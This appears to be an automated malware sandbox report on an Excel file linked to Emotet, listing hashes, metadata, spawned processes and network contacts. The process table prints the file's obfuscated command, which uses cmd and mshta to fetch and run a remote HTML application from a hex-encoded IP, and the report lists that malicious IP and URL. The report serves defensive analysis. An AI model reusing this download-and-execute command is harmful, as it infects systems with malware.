File name: | untitled 01855.xls |
Full analysis: | https://app.any.run/tasks/ccfe1da0-1745-4fe9-97ca-f06d94c9820e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 24, 2022, 15:30:03 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 24 07:24:12 2022, Last Saved Time/Date: Mon Jan 24 07:27:27 2022, Security: 0 |
MD5: | E0F40D19B55C5544F18FFC2330DA6F0A |
SHA1: | BA01C80044A7A71B64AA00921F1422ADED522A40 |
SHA256: | FFC5854A37D703DDB250B472116F28918014F0FAD3F6B548212E2DF276147AAB |
SSDEEP: | 3072:OB+nBqmpk3hbdlylKsgqopeJBWhZFGkE+cMLxAAInxe53lGvFTQ3IzxgdrvxpU0O:W+nBqmpk3hbdlylKsgqopeJBWhZFVE+K |
.xls | | | Microsoft Excel sheet (78.9) |
---|
Author: | xXx |
---|---|
LastModifiedBy: | xXx |
Software: | Microsoft Excel |
CreateDate: | 2022:01:24 07:24:12 |
ModifyDate: | 2022:01:24 07:27:27 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | - |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2196 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3912 | cmd /c ping google.com && timeout 4 && start m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se3.html | C:\Windows\system32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1944 | ping google.com | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2436 | timeout 4 | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
240 | mshta http://0x5cff39c3/sec/se3.html | C:\Windows\system32\mshta.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 11.00.9600.16428 (winblue_gdr.131013-1700) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2196 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR33DE.tmp.cvr | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
240 | mshta.exe | GET | — | 92.255.57.195:80 | http://92.255.57.195/sec/se3.html | RU | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
240 | mshta.exe | 92.255.57.195:80 | — | Telecom SP Ltd | RU | malicious |
Domain | IP | Reputation |
---|---|---|
google.com |
| whitelisted |